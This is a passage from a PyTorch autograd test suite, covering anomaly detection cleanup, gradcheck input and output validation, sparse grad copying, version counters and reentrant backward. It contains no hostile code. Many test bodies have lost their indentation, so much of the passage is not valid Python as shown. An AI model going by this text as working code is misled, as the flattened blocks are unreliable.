        self.assertIn('Anomaly Detection has been enabled', str(w[0].message))
        self.assertIn('Error detected in PowBackward0', s.captured)
    def test_anomaly_assign_parent_cleanup(self):
        """PyObjects created by anomaly-mode assign_parent must be freed when
        the referencing graph is destroyed (tracked via a weakref sentinel)."""
        # Test that python objects created are properly cleaned up when assign_parent is called
        import weakref
        def get_ref():
            # we use torch.exp here but any function that will construct a new node in its
            # backward call in grad mode will work
            x = torch.randn(2, 2, requires_grad=True)
            t = x.exp()
            # ExpBackward calls mul, creating the MulBackward node when create_graph=True.
            # In anomaly mode, a PyObject referencing MulBackward's "parent" ExpBackward is added to
            # MulBackward's anomaly metadata dict, creating the following reference chain:
            #
            # grad -> MulBackward -> PyObject -> ExpBackward
            #
            with detect_anomaly():
                grad = torch.autograd.grad(t, x, torch.ones_like(t), create_graph=True)
            # We add a weak reference to a new Foo object, which we insert into ExpBackward's metadata dict
            #
            # (PyObject) -> ExpBackward -> dict -> *Foo*
            #            t ----^            WeakRef ---^
            #
            # We want to test that when grad goes out of scope at the end of this function that PyObject is destroyed
            # We can test this by seeing whether Foo is not kept alive once t is destroyed
            class Foo(object):
                pass
            my_obj = Foo()
            meta_dict = t.grad_fn.metadata
            meta_dict[0] = my_obj
            ref = weakref.ref(my_obj)
            return t, ref
        t, ref = get_ref()
        self.assertIsNotNone(ref())
        del t
        self.assertIsNone(ref())
    def test_nested_anomaly_printstack_cleanup(self):
        """The anomaly metadata dict PyObject must still be destroyed even
        after printstack manipulates it while reporting a nested failure."""
        # Test if metadata dict PyObject is properly destroyed
        import weakref
        def get_ref():
            # This is similar to the construction in test_anomaly_assign_parent_cleanup:
            #
            # MyFuncBackward2 -> PyObject -> MyFuncBackward -> dict -> Foo
            #                                 out ---^         WeakRef ---^
            #
            # We want to check that Foo is still properly destroyed even when MyFunc2Backward's
            # AnomalyMetadata calls printstack, which does some python object manipulation.
            #
            # You might be wondering why we still have to test_anomaly_assign_parent_cleanup,
            # since if PyObject is not destroyed here, wouldn't this test would detect that also?
            # The answer is that custom function's PyObject (THPFunction) actually only hold
            # a weak reference to the c++ node!
            class MyFunc(Function):
                @staticmethod
                def forward(ctx, x):
                    ctx.save_for_backward(x)
                    return x
                @staticmethod
                def backward(ctx, gO):
                    x, = ctx.saved_tensors
                    return MyFunc2.apply(x)
            class MyFunc2(Function):
                @staticmethod
                def forward(ctx, x):
                    return x
                @staticmethod
                def backward(ctx, gO):
                    # NaN here triggers the anomaly printstack path in double backward.
                    return gO + float("NaN")
            inp = torch.rand(1, requires_grad=True)
            out = MyFunc.apply(inp)
            ginp, = torch.autograd.grad(out, (inp,), create_graph=True)
            with warnings.catch_warnings(record=True) as w:
                with self.assertRaisesRegex(RuntimeError, "Function 'MyFunc2Backward' returned nan values in its 0th output."):
                    with detect_anomaly():
                        ginp.backward()
            class Foo(object):
                pass
            my_obj = Foo()
            meta_dict = out.grad_fn.metadata
            meta_dict[0] = my_obj
            ref = weakref.ref(my_obj)
            return out, ref
        t, ref = get_ref()
        self.assertIsNotNone(ref())
        del t
        self.assertIsNone(ref())
@skipIfNoLapack
def test_eig_no_eigenvectors(self):
A = torch.tensor([[1., 2.], [2., 4.]], dtype=torch.float32, requires_grad=True)
w, v = torch.eig(A, eigenvectors=False)
with self.assertRaisesRegex(RuntimeError, 'cannot compute backward'):
torch.autograd.backward([w, v], [torch.ones_like(w), torch.ones_like(v)])
@skipIfNoLapack
def test_eig_complex_eigenvalues(self):
A = torch.tensor([[0., -1.], [1., 0.]], dtype=torch.float32, requires_grad=True)
w, v = torch.eig(A, eigenvectors=True)
with self.assertRaisesRegex(RuntimeError, 'does not support complex eigenvalues'):
torch.autograd.backward([w, v], [torch.ones_like(w), torch.ones_like(v)])
@skipIfNoLapack
def test_symeig_no_eigenvectors(self):
A = torch.tensor([[1., 2.], [2., 4.]], dtype=torch.float32, requires_grad=True)
w, v = torch.symeig(A, eigenvectors=False)
with self.assertRaisesRegex(RuntimeError, 'cannot compute backward'):
torch.autograd.backward([w, v], [torch.ones_like(w), torch.ones_like(v)])
@skipIfNoLapack
def test_svd_no_singularvectors(self):
A = torch.randn(2, 2, dtype=torch.float32, requires_grad=True)
u, s, v = torch.svd(A, compute_uv=False)
with self.assertRaisesRegex(RuntimeError, 'cannot compute backward'):
torch.autograd.backward([u, s, v], [torch.ones_like(u), torch.ones_like(s), torch.ones_like(v)])
    def test_no_grad_copy(self):
        """The autograd engine may hand the incoming grad buffer directly to
        one accumulating leaf (no copy), but must copy non-contiguous grads."""
        # create autograd function that saves grad pointer as class static
        class MyFunc(Function):
            static_grad_ptr = None
            @staticmethod
            def forward(ctx, inp1, inp2):
                return inp1 + inp2
            @staticmethod
            def backward(ctx, grad):
                MyFunc.static_grad_ptr = grad.data_ptr()
                return grad, grad
        class NonContGradFunc(Function):
            @staticmethod
            def forward(ctx, inp1):
                ctx.size = inp1.size()
                return torch.tensor([1.])
            @staticmethod
            def backward(ctx, grad):
                # expand() produces a non-contiguous gradient.
                return torch.ones(1).expand(ctx.size)
        a = torch.randn(5, 6, requires_grad=True)
        b = torch.randn(5, 6, requires_grad=True)
        # non-contiguous grad should be copied
        NonContGradFunc.apply(MyFunc.apply(a, b)).backward()
        self.assertFalse(a.grad.data_ptr() == MyFunc.static_grad_ptr)
        self.assertFalse(b.grad.data_ptr() == MyFunc.static_grad_ptr)
        # test case that should trigger no copy for one of a,b
        a.grad = b.grad = None
        MyFunc.apply(a, b)[1][0].backward()
        p_g = MyFunc.static_grad_ptr
        p_a = a.grad.data_ptr()
        p_b = b.grad.data_ptr()
        # check a,b uses different grad buffer
        self.assertFalse(p_a == p_b)
        # check one of them is using the computed buffer
        self.assertTrue(p_a == p_g or p_b == p_g)
    def test_no_grad_copy_sparse(self):
        """Sparse analogue of test_no_grad_copy: a contiguous sparse grad may
        be reused by one leaf; a non-contiguous one must be cloned for both."""
        # create autograd function that saves grad pointer as class static
        class MyFunc(Function):
            static_grad_ptr = None
            @staticmethod
            def forward(ctx, inp1, inp2):
                return inp1 + inp2
            @staticmethod
            def backward(ctx, grad):
                MyFunc.static_grad_ptr = grad._values().data_ptr()
                return grad, grad
        class NonContGradFunc(Function):
            static_grad_ptr = None
            @staticmethod
            def forward(ctx, inp1, inp2):
                return inp1 + inp2
            @staticmethod
            def backward(ctx, grad):
                # Create a sparse tensor with non-contigous indices and values
                # and return as grad.
                v = torch.rand(1, 3)
                i = torch.ones(1, 1, dtype=torch.long)
                nv = v.expand(8, 3)
                ni = i.expand(1, 8)
                ngrad = torch.sparse.FloatTensor(ni, nv, torch.Size([10, 3]))
                NonContGradFunc.static_grad_ptr = ngrad._values().data_ptr()
                return ngrad, ngrad
        a = torch.randn(10, 3, requires_grad=True)
        b = torch.randn(10, 3, requires_grad=True)
        input = torch.tensor([1, 2, 4, 5, 4, 3, 2, 9])
        offsets = torch.tensor([0, 4])
        import torch.nn.functional as F
        # test case that should trigger no copy for one of a,b
        emb_matrix = MyFunc.apply(a, b)
        loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum()
        loss.backward(retain_graph=True)
        p_g = MyFunc.static_grad_ptr
        p_a = a.grad._values().data_ptr()
        p_b = b.grad._values().data_ptr()
        # check a,b uses different grad buffer
        self.assertFalse(p_a == p_b)
        # check one of them is using the computed buffer
        self.assertTrue(p_a == p_g or p_b == p_g)
        # Run backwards multiple times to ensure accumulation works.
        for i in range(10):
            loss.backward(retain_graph=True)
        # non-contiguous indices and value, we should trigger a copy.
        a.grad = b.grad = None
        emb_matrix = NonContGradFunc.apply(a, b)
        loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum()
        loss.backward(retain_graph=True)
        p_g = NonContGradFunc.static_grad_ptr
        p_a = a.grad._values().data_ptr()
        p_b = b.grad._values().data_ptr()
        # check a,b uses different grad buffer
        self.assertFalse(p_a == p_b)
        # Verify we cloned both grads.
        self.assertFalse(p_a == p_g)
        self.assertFalse(p_b == p_g)
        # Run backwards multiple times to ensure accumulation works.
        for i in range(10):
            loss.backward(retain_graph=True)
def test_gradcheck_single_input(self):
def check(fast_mode):
def f(inp):
return inp.mul(5)
gradcheck(f, torch.rand(10, dtype=torch.float64, requires_grad=True), fast_mode=fast_mode)
gradgradcheck(f, torch.rand(10, dtype=torch.float64, requires_grad=True), fast_mode=fast_mode)
check(fast_mode=True)
check(fast_mode=False)
    def test_gradcheck_sparse_input(self):
        """Sparse inputs pass gradcheck only with check_sparse_nnz=True;
        otherwise gradcheck rejects them as non-dense."""
        def check(fast_mode):
            def fn(sparse):
                return torch.sparse.sum(sparse)
            gradcheck(fn, torch.rand(10, dtype=torch.double).to_sparse().requires_grad_(True), check_sparse_nnz=True,
                      check_batched_grad=False, fast_mode=fast_mode)
            with self.assertRaisesRegex(RuntimeError, 'gradcheck expects all tensor inputs are dense'):
                gradcheck(fn, torch.rand(10, dtype=torch.double).to_sparse().requires_grad_(True), check_sparse_nnz=False,
                          check_batched_grad=False, fast_mode=fast_mode)
        check(fast_mode=True)
        check(fast_mode=False)
    def test_gradcheck_nondeterministic(self):
        """gradcheck must flag non-reentrant (jittered) backward unless the
        jitter is within nondet_tol."""
        class NonDetFunc(Function):
            @staticmethod
            def forward(ctx, x, jitter=0.0):
                ctx._jitter = jitter
                return x
            @staticmethod
            def backward(ctx, grad_out):
                # Randomly perturb the gradient by up to `jitter` relative noise.
                return NonDetFunc.apply(grad_out, ctx._jitter) * (1 + torch.rand_like(grad_out) * ctx._jitter), None
        def check(fast_mode):
            inp = torch.randn(5, 5, dtype=torch.double, requires_grad=True)
            gradcheck(lambda x: NonDetFunc.apply(x, 0.0), inp, check_batched_grad=False, fast_mode=fast_mode)
            with self.assertRaisesRegex(RuntimeError, 'Backward is not reentrant'):
                gradcheck(lambda x: NonDetFunc.apply(x, 1e-6), inp, check_batched_grad=False, fast_mode=fast_mode)
            with self.assertRaisesRegex(RuntimeError, 'Backward is not reentrant'):
                gradgradcheck(lambda x: NonDetFunc.apply(x, 1e-12), inp, check_batched_grad=False, fast_mode=fast_mode)
            # With a tolerance larger than the jitter, all checks pass.
            gradcheck(lambda x: NonDetFunc.apply(x, 0.0), inp, nondet_tol=1e-5, check_batched_grad=False,
                      fast_mode=fast_mode)
            gradcheck(lambda x: NonDetFunc.apply(x, 1e-6), inp, nondet_tol=1e-5, check_batched_grad=False,
                      fast_mode=fast_mode)
            gradgradcheck(lambda x: NonDetFunc.apply(x, 1e-12), inp, nondet_tol=1e-5, check_batched_grad=False,
                          fast_mode=fast_mode)
        check(fast_mode=True)
        check(fast_mode=False)
    def test_gradcheck_validates_inputs(self):
        """Input validation in gradcheck: sparse without check_sparse_nnz,
        no grad-requiring inputs, low precision, and zero-stride dims."""
        def check(fast_mode):
            # when inputs are not dense, but check_sparse_nnz is false
            x = torch.rand(10, requires_grad=True).to_sparse()
            with self.assertRaisesRegex(RuntimeError, 'dense when check_sparse_nnz is set to False.'):
                gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=False, check_batched_grad=False,
                          fast_mode=fast_mode)
            self.assertFalse(gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=False,
                                       check_batched_grad=False, raise_exception=False, fast_mode=fast_mode))
            # when none of the inputs require grad (always raises even if raise_exception=False)
            x = torch.rand(10, requires_grad=False)
            with self.assertRaisesRegex(ValueError, 'at least one input tensor to require gradient'):
                gradcheck(lambda x: x, (x,), raise_exception=False, fast_mode=fast_mode)
            # (warning) when inputs are not double precision
            x = torch.ones(1, dtype=torch.float32, requires_grad=True)
            with self.assertWarnsRegex(UserWarning, "Input #0 requires gradient and is not a double precision"):
                self.assertTrue(gradcheck(lambda x: x, (x,), atol=1e-1, fast_mode=fast_mode))
            # when layout is not mkldnn(aka has strides) and input has a dimension with stride 0. (always raises
            # even if raise_exception=False)
            x = torch.ones(1, dtype=torch.float64, requires_grad=True)
            x = x.expand((2, 2))
            with self.assertRaisesRegex(RuntimeError, 'The 0th input has a dimension with stride 0'):
                gradcheck(lambda x: x, (x,), raise_exception=False, fast_mode=fast_mode)
        check(fast_mode=True)
        check(fast_mode=False)
    @unittest.skipIf(not torch._C.has_mkldnn, "MKL-DNN build is disabled")
    def test_gradcheck_test_outputs(self):
        """gradcheck rejects sparse and MKLDNN outputs unconditionally,
        even with raise_exception=False."""
        def check(fast_mode):
            # when sparse outputs (always raise even if raise_exception=False)
            x = torch.rand(10, requires_grad=True).to_sparse()
            with self.assertRaisesRegex(ValueError, 'Sparse output is not supported at gradcheck yet'):
                gradcheck(lambda x: x, (x,), check_sparse_nnz=True, check_batched_grad=False, raise_exception=False,
                          fast_mode=fast_mode)
            # when mkldnn outputs (always raise even if raise_exception=False)
            root = torch.randn(4, 5, dtype=torch.float32, requires_grad=True)
            with self.assertRaisesRegex(ValueError, 'MKLDNN output is not supported at gradcheck yet'):
                gradcheck(lambda x: x.to_mkldnn(), (root,), check_batched_grad=False, raise_exception=False, fast_mode=fast_mode)
        check(fast_mode=True)
        check(fast_mode=False)
def test_gradcheck_check_no_differentiable_outputs(self):
def check(fast_mode):
# When none of the outputs are differentiable, but numerical gradient is not zero
x = torch.ones((1,), requires_grad=True)
with self.assertRaisesRegex(RuntimeError, 'Numerical gradient for function expected to be zero'):
gradcheck(lambda x: torch.tensor([x]), x)
self.assertFalse(gradcheck(lambda x: torch.tensor([x]), x, raise_exception=False, fast_mode=fast_mode))
# succeed when no outputs at all
self.assertTrue(gradcheck(lambda x: (), (x,), fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_check_batched_grad(self):
def check(fast_mode):
x = torch.rand(10, dtype=torch.double, requires_grad=True).to_sparse()
# runtime error while compute batched grad (print big error)
with self.assertRaisesRegex(RuntimeError, 'gradcheck or gradgradcheck failed while testing batched gradient'):
gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=True, check_batched_grad=True, fast_mode=fast_mode)
self.assertFalse(gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=True, check_batched_grad=True,
raise_exception=False, fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
    def test_gradcheck_backward_mul_by_grad_output(self):
        """gradcheck's sanity checks on grad_input: wrong sparse dims, backward
        not scaling with grad_output (dense and sparse), and mismatched layout."""
        # when grad_input is sparse and has incorrect sparse_dim/dense_dim
        def check(fast_mode):
            def fn(x):
                def hook(grad):
                    if grad is not None:
                        # Corrupt the sparse_dim of the incoming gradient.
                        return grad.to_dense().to_sparse(1)
                    return grad
                y = x.clone()
                y.register_hook(hook)
                return y.to_dense()
            x = torch.ones((2, 2), dtype=torch.double, requires_grad=True).to_sparse()
            with self.assertRaisesRegex(RuntimeError, 'grad is sparse tensor, but has incorrect sparse_dim'):
                gradcheck(fn, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False, fast_mode=fast_mode)
            self.assertFalse(gradcheck(fn, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False,
                                       raise_exception=False, fast_mode=fast_mode))
            # when backward not multiplied by grad_output (non-sparse case)
            def fn2(x):
                y = x.clone()
                y.register_hook(lambda x: x + 1e-2)
                return y
            x = torch.ones(1, dtype=torch.double, requires_grad=True)
            with self.assertRaisesRegex(RuntimeError, 'backward not multiplied by grad_output'):
                gradcheck(fn2, (x,), atol=1e-1, fast_mode=fast_mode)
            self.assertFalse(gradcheck(fn2, (x,), atol=1e-1, raise_exception=False, fast_mode=fast_mode))
            # when backward not multiplied by grad_output (sparse case)
            def fn3(x):
                y = x.clone().to_dense()
                y.register_hook(lambda x: x + 1e-2)
                return y
            x = torch.ones(1, dtype=torch.double, requires_grad=True).to_sparse()
            with self.assertRaisesRegex(RuntimeError, 'backward not multiplied by grad_output'):
                gradcheck(fn3, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False, fast_mode=fast_mode)
            self.assertFalse(gradcheck(fn3, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False,
                                       raise_exception=False, fast_mode=fast_mode))
            # when layout of grad_input is not the same as input
            class Test(Function):
                @staticmethod
                def forward(ctx, x):
                    return x
                @staticmethod
                def backward(ctx, x):
                    return x.to_sparse()
            x = torch.ones(1, dtype=torch.double, requires_grad=True)
            with self.assertRaisesRegex(RuntimeError, 'grad is incorrect layout'):
                gradcheck(Test.apply, (x,), check_batched_grad=False, fast_mode=fast_mode)
            self.assertFalse(gradcheck(Test.apply, (x,), check_batched_grad=False, raise_exception=False, fast_mode=fast_mode))
        check(fast_mode=True)
        check(fast_mode=False)
def test_gradcheck_undefined_grad(self):
def check(fast_mode):
# when encounter runtime error while running backward
def fn(x):
def hook(x):
if x is None:
raise RuntimeError("x is undefined")
y = x.clone()
y.register_hook(hook)
return y
x = torch.ones(1, dtype=torch.double, requires_grad=True)
with self.assertWarnsRegex(UserWarning, "Backwards compatibility: New undefined gradient support checking feature"):
with self.assertRaisesRegex(RuntimeError, 'Expected backward function to handle undefined output grads'):
gradcheck(fn, (x,), fast_mode=fast_mode)
self.assertFalse(gradcheck(fn, (x,), raise_exception=False, fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
    def test_gradcheck_jacobian_mismatch(self):
        """gradcheck must report Jacobian mismatches, including the dedicated
        message for the imaginary part of complex outputs (slow mode only for
        the complex cases)."""
        def check(fast_mode):
            def fn(x):  # R -> R, C -> C
                y = x.clone()
                # Perturb the analytical gradient so it disagrees with numerics.
                y.register_hook(lambda x: x + 1e-2)
                return y
            x = torch.ones(2, 2, requires_grad=True)
            with self.assertRaisesRegex(RuntimeError, 'Jacobian mismatch for output 0 with respect to input 0'):
                gradcheck(fn, (x,), fast_mode=fast_mode)
            self.assertFalse(gradcheck(fn, (x,), raise_exception=False, fast_mode=fast_mode))
            x_c = torch.ones(2, 2, requires_grad=True, dtype=torch.complex128)
            with self.assertRaisesRegex(RuntimeError, 'While considering the imaginary part of complex outputs only'):
                gradcheck(fn, (x_c,), fast_mode=False)
            self.assertFalse(gradcheck(fn, (x_c,), raise_exception=False, fast_mode=False))
            def fn2(x):  # R -> C
                y = torch.complex(x, x)
                y.register_hook(lambda x: x + 1e-2)
                return y
            x = torch.ones(2, 2, requires_grad=True)
            with self.assertRaisesRegex(RuntimeError, 'While considering the imaginary part of complex outputs only'):
                gradcheck(fn2, (x,), fast_mode=False)
            self.assertFalse(gradcheck(fn2, (x,), raise_exception=False, fast_mode=False))
            def fn3(x):  # C -> R
                y = torch.real(x)
                y.register_hook(lambda x: x + 1e-2)
                return y
            with self.assertRaisesRegex(RuntimeError, 'Jacobian mismatch for output 0 with respect to input 0'):
                gradcheck(fn3, (x_c,), fast_mode=False)
            self.assertFalse(gradcheck(fn3, (x_c,), raise_exception=False, fast_mode=False))
        check(fast_mode=True)
        check(fast_mode=False)
def test_gradcheck_dense_and_sparse_inputs(self):
def check(fast_mode):
def fn(x, y):
return x * y.coalesce().to_dense()
a = torch.rand(2, 2, dtype=torch.double, requires_grad=True)
b = torch.rand(2, 2, dtype=torch.double,).to_sparse().requires_grad_(True)
self.assertTrue(gradcheck(fn, (a, b), check_sparse_nnz=True, check_batched_grad=False, fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
@unittest.skipIf(not torch._C.has_mkldnn, "MKL-DNN build is disabled")
def test_gradcheck_multiple_mkldnn_inputs(self):
def check(fast_mode):
def fn(x, y):
return x + y.to_dense()
a = torch.rand(10, requires_grad=True)
b = torch.rand(10, dtype=torch.float32).to_mkldnn().requires_grad_(True)
self.assertTrue(gradcheck(fn, (a, b), atol=1e-1, check_batched_grad=False, fast_mode=fast_mode))
def fn2(x, y):
return x.to_dense() + y.to_dense()
c = torch.rand(10, dtype=torch.float32).to_mkldnn().requires_grad_(True)
self.assertTrue(gradcheck(fn, (a, c), atol=1e-1, check_batched_grad=False, fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_output_shape_or_dtype_depend_on_values(self):
def check(fast_mode):
def fn(x):
if torch.all(x >= 1):
return torch.cat([x, x])
else:
return x
a = torch.ones(1, dtype=torch.double, requires_grad=True)
with self.assertRaisesRegex(AssertionError, 'return outputs with the same shape when inputs are perturbed'):
self.assertTrue(gradcheck(fn, (a,), fast_mode=fast_mode))
def fn2(x):
if torch.all(x >= 1):
return x.to(torch.float32)
else:
return x
with self.assertRaisesRegex(AssertionError, 'return outputs with the same dtype when inputs are perturbed'):
self.assertTrue(gradcheck(fn2, (a,), fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_complex_non_complex_outputs(self):
def fn(x, y):
z = torch.complex(x, y)
return z, x + 1
a = torch.ones(2, 2, requires_grad=True, dtype=torch.float64)
b = torch.ones(2, 2, requires_grad=True, dtype=torch.float64)
self.assertTrue(gradcheck(fn, (a, b)))
def fn2(z):
return z, torch.real(z)
c = torch.ones(2, 2, requires_grad=True, dtype=torch.complex128)
self.assertTrue(gradcheck(fn2, (c)))
    def test_gradcheck_get_numerical_jacobian(self):
        # get_numerical_jacobian is deprecated and no longer used internally by gradcheck
        # This test pins the deprecated API's behavior: it must still compute
        # correct jacobians but emit a deprecation UserWarning on every call.
        from torch.autograd.gradcheck import get_numerical_jacobian
        def fn(inputs):
            # get_numerical_jacobian requires fn to take inputs as a tuple
            # and returns the jacobian wrt the first output
            x = inputs[0]
            y = inputs[1]
            return 2 * x + y, x + 2 * y
        a = torch.rand(2, 2, requires_grad=True, dtype=torch.float64)
        b = torch.rand(2, 2, requires_grad=True, dtype=torch.float64)
        # With target=a: jacobian of output 0 wrt `a` only (d(2x+y)/dx = 2I)
        with self.assertWarnsRegex(UserWarning, "get_numerical_jacobian was part of PyTorch's private API"):
            jacobian = get_numerical_jacobian(fn, (a, b), target=a, eps=1e-6)
        self.assertEqual(jacobian[0], 2 * torch.eye(4, dtype=torch.double))
        # Without target: jacobians of output 0 wrt every input
        with self.assertWarnsRegex(UserWarning, "get_numerical_jacobian was part of PyTorch's private API"):
            jacobian = get_numerical_jacobian(fn, (a, b), eps=1e-6)
        self.assertEqual(jacobian[0], 2 * torch.eye(4, dtype=torch.double))
        self.assertEqual(jacobian[1], 1 * torch.eye(4, dtype=torch.double))
        # The deprecated entry point only supports grad_out == 1.0
        with self.assertRaisesRegex(ValueError, "Expected grad_out to be 1.0"):
            jacobian = get_numerical_jacobian(fn, (a, b), eps=1e-6, grad_out=2.0)
    def test_gradcheck_get_analytical_jacobian(self):
        # Pins the behavior of the deprecated private helper: correct
        # jacobians, deprecation warning on call, reentrancy detection, and
        # rejection of grad_out != 1.0.
        from torch.autograd.gradcheck import get_analytical_jacobian
        def fn(x, y):
            return 2 * x + y, x + 2 * y
        a = torch.rand(2, 2, requires_grad=True, dtype=torch.float64)
        b = torch.rand(2, 2, requires_grad=True, dtype=torch.float64)
        outputs = fn(a, b)
        with self.assertWarnsRegex(UserWarning, "get_analytical_jacobian was part of PyTorch's private API"):
            jacobians, reentrant, correct_grad_sizes, correct_grad_types = get_analytical_jacobian((a, b), outputs[0])
        self.assertEqual(jacobians[0], 2 * torch.eye(4, dtype=torch.double))
        self.assertEqual(jacobians[1], 1 * torch.eye(4, dtype=torch.double))
        # Deterministic backward => recomputing the rows gives identical results
        self.assertTrue(reentrant)
        # Backward multiplies the grad by a random jitter, so two backward
        # passes disagree and the jacobian must be flagged as non-reentrant.
        class NonDetFunc(Function):
            @staticmethod
            def forward(ctx, x, jitter=0.0):
                ctx._jitter = jitter
                return x
            @staticmethod
            def backward(ctx, grad_out):
                return NonDetFunc.apply(grad_out, ctx._jitter) * (1 + torch.rand_like(grad_out) * ctx._jitter), None
        outputs = NonDetFunc.apply(a, 1e-6)
        with self.assertWarnsRegex(UserWarning, "get_analytical_jacobian was part of PyTorch's private API"):
            jacobians, reentrant, correct_grad_sizes, correct_grad_types = get_analytical_jacobian((a,), outputs)
        self.assertFalse(reentrant)
        # The deprecated entry point only supports grad_out == 1.0
        with self.assertRaisesRegex(ValueError, "Expected grad_out to be 1.0"):
            jacobians, _, _, _ = get_analytical_jacobian((a,), outputs, grad_out=2.0)
def test_gradcheck_custom_error(self):
from torch.autograd.gradcheck import GradcheckError
def check(fast_mode):
def fn(x):
y = x.clone()
y.register_hook(lambda x: x + 1e-2)
return y
x = torch.ones(2, 2, requires_grad=True)
with self.assertRaisesRegex(GradcheckError, 'Jacobian mismatch for output 0 with respect to input 0'):
gradcheck(fn, (x,), fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, 'Jacobian mismatch for output 0 with respect to input 0'):
gradcheck(fn, (x,), fast_mode=fast_mode)
self.assertFalse(gradcheck(fn, (x,), raise_exception=False, fast_mode=fast_mode))
def fn2(x):
raise RuntimeError("Not a GradcheckError!")
# Checks that when raise_exception=False, non-GradcheckErrors are not caught by gradcheck
with self.assertRaisesRegex(RuntimeError, "Not a GradcheckError!"):
gradcheck(fn2, (x,), fast_mode=fast_mode, raise_exception=False)
check(fast_mode=True)
check(fast_mode=False)
    def test_version_counter(self):
        # Pins the semantics of the private `_version` counter: bumped by
        # in-place ops, shared between a base tensor and its differentiable
        # views, and preserved across `.data` assignment.
        x = torch.randn(1, 2)
        # In-place op bumps version
        x_saved_version = x._version
        x.add_(1).add_(1)
        self.assertTrue(x._version > x_saved_version)
        # Differentiable view shares version counter
        xz = x[:]
        self.assertTrue(x._version == xz._version)
        xz.add_(1)
        self.assertTrue(x._version == xz._version)
        # `x.data = y` preserves version counter of `x`
        x_saved_version = x._version
        x.data = torch.randn(2, 3)
        self.assertTrue(x._version == x_saved_version)
        x.add_(1)
        self.assertTrue(x._version > x_saved_version)
        # Make sure `x` is still using the same version counter it shares with `xz`
        self.assertTrue(x._version == xz._version)
        # In-place op on `xz` also updates version of `x`,
        # because they share the version counter
        xz.add_(1)
        self.assertTrue(x._version == xz._version)
def test_set_data_tensorimpl_type(self):
# Dense tensor has impl of type `TensorImpl`, while sparse tensor has impl
# of type `SparseTensorImpl`.
x = torch.randn(1, 2)
x_s = torch.sparse_coo_tensor(torch.zeros([1, 1]), torch.ones([1]))
with self.assertRaisesRegex(RuntimeError, 'incompatible tensor type'):
x.data = x_s
def test_set_data_preserve_pyobj(self):
a = torch.randn(1, 2)
b = torch.randn(1, 2)
b_id_saved = id(b)
b.data = a
self.assertTrue(b_id_saved == id(b))
    @unittest.skipIf(IS_WINDOWS, "Skipping because doesn't work for windows")
    def test_thread_shutdown(self):
        # Runs a small autograd program in a subprocess and asserts that the
        # engine's worker-thread shutdown path emits its API-usage log entry.
        # NOTE: `code` is runtime data executed by the child process — do not
        # edit it for style.
        code = """import torch
from torch.autograd import Function
class MyFunction(Function):
    @staticmethod
    def forward(ctx, x):
        return x

    @staticmethod
    def backward(ctx, grad):
        return grad

for shape in [(1,), ()]:
    v = torch.ones(shape, requires_grad=True)
    MyFunction.apply(v).backward()
"""
        s = TestCase.runWithPytorchAPIUsageStderr(code)
        # The shutdown event must have been reported on stderr.
        self.assertRegex(s, "PYTORCH_API_USAGE torch.autograd.thread_shutdown")
    @unittest.skipIf(IS_MACOS, "Fails with SIGBUS on macOS; https://github.com/pytorch/pytorch/issues/25941")
    def test_deep_reentrant(self):
        # Each backward() spawns another reentrant backward until ctx.x drops
        # below zero, creating a very deep chain of nested backward calls.
        class DeepReentrant(Function):
            @staticmethod
            def forward(ctx, x):
                with torch.enable_grad():
                    ctx.x = Variable(x.detach(), requires_grad=True)
                    ctx.x = ctx.x - 1
                return ctx.x.detach()
            @staticmethod
            def backward(ctx, x):
                if ctx.x < 0:
                    return x
                with torch.enable_grad():
                    DeepReentrant.apply(ctx.x).sum().backward()
                return x
        # Test stack overflow escape mechanism
        v = torch.tensor(2000.0, requires_grad=True)
        # This will cause stack overflow if reentrant calls are handled
        # in the same thread recursively
        DeepReentrant.apply(v).sum().backward()
        # Test stack overflow escape mechanism multiple times
        # to ensure reusing workers in the pool works fine
        v2 = torch.tensor(200.0, requires_grad=True)
        DeepReentrant.apply(v2).sum().backward()
    def test_reentrant_priority(self):
        # Records execution order of backward functions to verify that the
        # engine prioritizes reentrant backward tasks over the ordinary ones
        # already sitting in its queue.
        order = []
        class MyFunction(Function):
            @staticmethod
            def forward(ctx, x):
                return x
            @staticmethod
            def backward(ctx, x):
                order.append("MyFunction")
                return x
        class Reentrant(Function):
            @staticmethod
            def forward(ctx, x):
                with torch.enable_grad():
                    ctx.x = Variable(x.detach(), requires_grad=True)
                    ctx.x = ctx.x - 1
                return ctx.x.detach()
            @staticmethod
            def backward(ctx, x):
                order.append("Reentrant")
                if ctx.x < 0:
                    return x
                with torch.enable_grad():
                    Reentrant.apply(ctx.x).backward()
                return x
        a = MyFunction.apply(torch.tensor(6.0, requires_grad=True))
        b = Reentrant.apply(torch.tensor(9.0, requires_grad=True))
        v = a * b
        v.backward()
        # The tasks for the Reentrant and MyFunction backward() will be added
        # to the queue in the autograd engine at the same time. The backward
        # for Reentrant will be executed first, which will then add other
        # backward tasks to the queue. We want to ensure all the reentrant tasks
        # are prioritized over the MyFunction backward task regardless of their
        # sequence numbers
        self.assertEqual(len(order), 11)
        self.assertEqual(order.count("Reentrant"), 10)
        self.assertEqual(order[-1], "MyFunction")
@slowTest
def test_checkpointing(self):
num_inp = 2000
nz_inp = 10
nz_out = 10
nz_bottleneck = 1000
# small proxy network for some complex reasoning we want to do per input
module = nn.Sequential(
nn.Linear(nz_inp, nz_bottleneck),
nn.ReLU(),
nn.Linear(nz_bottleneck, nz_inp)
)
feat_combined = []
for r in range(num_inp):
data_r = torch.empty(1, nz_inp)
data_r.uniform_()
data_r.requires_grad = True
feat_r = checkpoint(module, data_r)
feat_combined.append(feat_r)
# compute mean as a proxy for some joint reasoning
mean_combined = torch.stack(feat_combined).mean()
